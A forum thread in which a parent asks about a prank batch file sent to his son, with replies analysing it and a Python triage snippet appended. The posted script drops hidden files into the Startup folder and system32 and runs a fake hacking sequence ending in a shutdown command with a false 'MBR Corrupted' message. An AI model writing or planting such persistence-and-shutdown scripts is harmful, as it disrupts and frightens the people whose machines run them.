Son's "friend" trying to get him to run this

My son's mate got him to create a bat file with the below code in it.

Looks to me like its main aim is to scare him but does it also do anything malicious?

He didn't run it, he emailed it to me instead.

@Echo off
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat" goto done

echo @Echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo title Kick >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set trig=01 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
rem change the above trig value to any date you want the file to run

set datee=%date% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set datee1=%datee:~7,2% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"

if not "%trig%"=="%datee1%" goto :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo start "C:\WINDOWS\system32\switch.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
attrib +h "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"

if exist "C:\WINDOWS\system32/switch.bat" goto done

echo @Echo off > "C:\WINDOWS\system32\switch.bat"
echo color 07 >> "C:\WINDOWS\system32\switch.bat"
echo title Connecting from 135.234.77.11 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST MACHINE FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo set count1=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a1 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count1%"=="500" goto next1 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count1+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a1 >> "C:\WINDOWS\system32\switch.bat"
echo :next1 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo ACQURING HOST IP ADDRESS..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count2=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a2 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count2%"=="500" goto next2 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count2+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a2 >> "C:\WINDOWS\system32\switch.bat"
echo :next2 >> "C:\WINDOWS\system32\switch.bat"

echo ipconfig/all >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST IP ADDRESS ACQURIED..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count3=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a3 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count3%"=="500" goto next3 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count3+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a3 >> "C:\WINDOWS\system32\switch.bat"
echo :next3 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo SEARCHING FOR OPEN TERMINALS................. >> "C:\WINDOWS\system32\switch.bat"
echo set count4=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a4 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count4%"=="500" goto next4 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count4+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a4 >> "C:\WINDOWS\system32\switch.bat"
echo :next4 >> "C:\WINDOWS\system32\switch.bat"

echo set count5=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a5 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count5%"=="500" goto next5 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count5+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a5 >> "C:\WINDOWS\system32\switch.bat"
echo:next5 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo OPEN TERMINAL FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo set count6=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a6 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count6%"=="500" goto next6 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count6+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a6 >> "C:\WINDOWS\system32\switch.bat"
echo :next6 >> "C:\WINDOWS\system32\switch.bat"

echo echo.
echo echo INITIATING BRUTE FORCE ATTACK ON FIREWALL..... >> "C:\WINDOWS\system32\switch.bat"
echo set count7=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a7 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count7%"=="500" goto next7 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count7+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a7 >> "C:\WINDOWS\system32\switch.bat"
echo :next7 >> "C:\WINDOWS\system32\switch.bat"

echo set count8=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a8 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count8%"=="500" goto next8 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count8+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a8 >> "C:\WINDOWS\system32\switch.bat"
echo :next8 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo FIREWALL DISABLED............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count9=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a9 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count9%"=="500" goto next9 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count9+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a9 >> "C:\WINDOWS\system32\switch.bat"
echo :next9 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING ALL FILES............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count10=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a10 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count10%"=="500" goto next10 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count10+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a10 >> "C:\WINDOWS\system32\switch.bat"
echo :next10 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo dir /s >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING COMPLETE.............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count11=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a11 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count11%"=="500" goto next11 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count11+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a11 >> "C:\WINDOWS\system32\switch.bat"
echo :next11 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo INSTALLING K1ll5W1T(H.exe..................... >> "C:\WINDOWS\system32\switch.bat"

echo copy "C:\WINDOWS\system32\vback.nrk" "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count12=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a12 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count12%"=="500" goto next12 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count12+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a12 >> "C:\WINDOWS\system32\switch.bat"
echo :next12 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo K1ll5W1T(H.exe INSTALLATION COMPLETE.......... >> "C:\WINDOWS\system32\switch.bat"
echo set count13=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a13 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count13%"=="500" goto next13 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count13+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a13 >> "C:\WINDOWS\system32\switch.bat"
echo :next13 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo EXECUTING K1ll5W1T(H.exe...................... >> "C:\WINDOWS\system32\switch.bat"
echo start "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count14=0 >> "C:\WINDOWS\system32/switch.bat"
echo :a14 >> "C:\WINDOWS\system32/switch.bat"
echo if "%count14%"=="500" goto next14 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count14+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a14 >> "C:\WINDOWS\system32\switch.bat"
echo :next14 >> "C:\WINDOWS\system32\switch.bat"

echo shutdown -l -tp 30 -c "MBR Corrupted! Windows is Shutting Down" >> "C:\WINDOWS\system32\switch.bat"
echo exit >> "C:\WINDOWS\system32\switch.bat"
attrib +h "C:\WINDOWS\system32\switch.bat"

if exist "C:\WINDOWS\system32\vback.nrk" goto done
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$K1ll5W1T(H ALERT CORRUPTING SYSTEM SHUTDOWN!$H+H* > "C:\WINDOWS\system32\vback.nrk"
attrib +h "C:\WINDOWS\system32\vback.nrk"

:done
echo dir/s > %0
exit
 
I don't have a clue but the very bottom line states about corrupting system shutdown.

tempted to run it on a VM and see what happens lol
 
Looks a bit suspect to me - why bother to run it at all. I would delete it myself. If it was given to him by a friend - there must surely have been some purpose of this file mentioned somewhere?
 
Looks to be a scare rather than malicious. Writes some crap to a variety of batch files to be run sequentially. One of which shuts down your machine with a snotty message.

Delete it and respond with "Well Played signor".
 
Tested it on a VM I was getting rid of and copied what was above and saved it as a bat file.

Ran it and a cmd box appeared and then nothing else happened, no restarts or messages. This was a Windows 7 VM.
 
It looks like it drops files to be run on startup. Reboot your VM and see if you get a load of messages about copying files and brute force attacks on your firewall, and a corrupt MBR and then a shutdown?
 
I have rebooted it, doesn't seem to do anything.
 
I would be letting the kid's parents know (or maybe you talk to him privately), because it could turn from a joke to malicious very quickly and get himself in serious crap being naive.
 
Someone must have been really bored, if the extra file is included it can trip a false positive on some anti-virus programs otherwise nothing particularly harmful.

I doubt it's the original work of the friend in question as several similar variants are floating around.
 
Funny that he's got typos in it, maybe we should sort it out and send it back to him!

I told my son not to do anything the kid asks him to do, he comes across as some kind of wannabe hacker going on about VPNs and botnets, it was that that made me wonder if there was a subtext to the bat file that I was missing.
My son is obviously intrigued by the kid who has jailbroken phones and a seemingly extensive knowledge of programming, although he doesn't.

Aged 15 he doesn't know much about command line and batch files but this episode has made him interested in what goes on under the bonnet of Windows which isn't a bad thing, at least he has the spider sense that told him not to run what he was being told to run.
 
A shame he can't type otherwise it may have worked if anyone ran it lol.
 
I wanted my son to understand what kind of friend he had, it was either the sort that wanted to scare him for a laugh or one that shouldn't be trusted.. turns out it's both really.
 
shutdown -l -tp 30 -c

Only part that does anything from what I can see and it's filled with typos so probably wouldn't work anyway as people have mentioned. At most it shuts the PC down and gives the user a fright.

Thing is as harmless as it is the intention is clear, to annoy and make the PC repeatedly do it, hence the attrib changes they attempt to make, what an idiot.
 
Would need to run it as the admin, not just admin user to get it to do anything but just looks like it pops up some messages then shuts down the pc.

Also it adds itself to the user's start-up folder (pre Vista users only mind thanks to its poor coding!) so will shut it down every 30 seconds the user is logged in.

If UAC is enabled it won't do nothing.
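
An added example, not code from any poster in the thread: a small Python static triage for a dropper-style batch file like the one posted. It lists each file the script writes or hides, the text echoed into it, and flags for the Startup-folder, system32, hidden-attribute, shutdown and self-overwrite behaviours the replies mention. The function names and flag labels are this example's own, and the sample lines are an excerpt of the posted script.

```python
import re

# Excerpt of the batch file posted at the top of the thread (paths as posted).
STARTUP = r'"C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"'
SWITCH = r'"C:\WINDOWS\system32\switch.bat"'
SAMPLE = "\n".join([
    "@Echo off",
    "echo @Echo off > " + STARTUP,
    "set trig=01 >> " + STARTUP,
    "echo start " + SWITCH + " >> " + STARTUP,
    "attrib +h " + STARTUP,
    "echo dir /s >> " + SWITCH,
    'echo shutdown -l -tp 30 -c "MBR Corrupted! Windows is Shutting Down" >> ' + SWITCH,
    "attrib +h " + SWITCH,
    "echo dir/s > %0",
])

# Command, redirect operator, then a quoted or bare target at end of line.
REDIRECT = re.compile(r'^(.*?)\s*(>>?)\s*("[^"]+"|\S+)\s*$')
HIDE = re.compile(r'^attrib\s+.*\+h\s+("[^"]+"|\S+)', re.I)

def norm(path):
    """Strip quotes, unify slashes and case so path variants compare equal."""
    return path.strip('"').replace("/", "\\").lower()

def triage(script):
    """Map each file the script writes or hides to its echoed payload and flags."""
    report = {}
    for line in map(str.strip, script.splitlines()):
        red, hid = REDIRECT.match(line), HIDE.match(line)
        if not (red or hid):
            continue
        target = norm(hid.group(1) if hid else red.group(3))
        item = report.setdefault(target, {"payload": [], "flags": set()})
        if hid:
            item["flags"].add("hidden")
            continue
        cmd = red.group(1)
        # Only echoed text is modelled; variables are not expanded.
        if cmd.lower().startswith("echo "):
            item["payload"].append(cmd[5:])
            if re.match(r"shutdown\b", cmd[5:], re.I):
                item["flags"].add("shutdown-command")
        if "\\programs\\startup\\" in target:
            item["flags"].add("startup-persistence")
        if "\\windows\\system32\\" in target:
            item["flags"].add("system32-write")
        if target == "%0":
            item["flags"].add("overwrites-itself")
    return report
```

Calling `triage(SAMPLE)` returns one entry per target, so a reviewer can read what would land in each dropped file without executing the script.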
 